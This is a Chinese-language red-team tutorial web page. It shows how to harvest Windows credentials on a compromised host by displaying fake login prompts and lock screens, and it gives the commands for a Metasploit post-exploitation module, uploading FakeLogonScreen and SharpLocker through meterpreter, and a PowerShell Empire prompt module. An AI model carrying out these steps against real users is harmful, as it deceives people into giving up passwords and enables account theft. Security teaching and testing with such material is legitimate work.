主页 > 网络知识 > 红队技巧:仿冒Windows登录

红队技巧:仿冒Windows登录

Metasploit带有内置的后期漏洞利用功能,可帮助我们完成任务。由于它是后渗透的模块,因此只需要输入会话即可:

use post/windows/gather/phish_windows_credentials 

set session 1

exploit

 

红队技巧:仿冒Windows登录

 

该模块等待用户开始新的过程。启动该过程后,将打开一个虚假的Windows安全对话框,要求用户提供凭据,如下图所示:

 

红队技巧:仿冒Windows登录

 

当用户输入其凭据时,它们将被捕获并显示,如下图所示:

 

红队技巧:仿冒Windows登录

 

FakeLogonScreen

FakeLogonScreen工具由Arris Huijgen创建。它是用C#开发的,因为它允许程序注入内存中。我们将使用Metasploit远程执行此工具。但是首先,让我们使用下面提供的链接下载该工具

下载FakeLogonScreen

我们只需从meterpreter会话中上传此工具,然后使用以下命令远程执行它:

upload /root/FakeLogonScreen.exe . 

shell 

FakeLogonScreen.exe

 

红队技巧:仿冒Windows登录

 

执行后,它将模拟Windows锁定屏幕以从用户获取密码。为此,此工具将显示与配置完全相同的锁定屏幕,以使用户不会感到可疑,如下图所示:

 

红队技巧:仿冒Windows登录

 

当用户输入凭据时,它将在本地或从域控制器验证凭据,然后将其显示在控制台上,如下图所示:

 

红队技巧:仿冒Windows登录

 

SharpLocker

此工具与以前的工具非常相似。它是由Matt Pickford开发的。就像FakeLogonScreen一样,此工具也将显示伪造的锁定屏幕,供用户输入凭据,然后将击键的内容转储给攻击者。

下载SharpLocker

我们将首先将该工具从攻击者机器上载到目标系统,然后执行它。因此,当您有meterpreter会话时,只需键入:

upload /root/Downloads/SharpLocker.exe . 

shell

SharpLocker.exe

我们将该工具下载到了桌面上,因此我们将遍历该位置然后执行它

 

红队技巧:仿冒Windows登录

 

执行后,该工具将触发目标系统的锁定屏幕,如下图所示:

 

红队技巧:仿冒Windows登录

 

当用户输入密码时,它将捕获按键,直到显示整个密码为止,如下图所示:

 

红队技巧:仿冒Windows登录

 

PowerShell Empire

PowerShell Empire的此模块将在目标系统上提示一个对话框,要求像我们之前所做的那样获得凭据。我们可以通过以下命令使用此模块:

usemodule collection/prompt 

execute

说点什么吧
  • 全部评论(0
    还没有评论,快来抢沙发吧!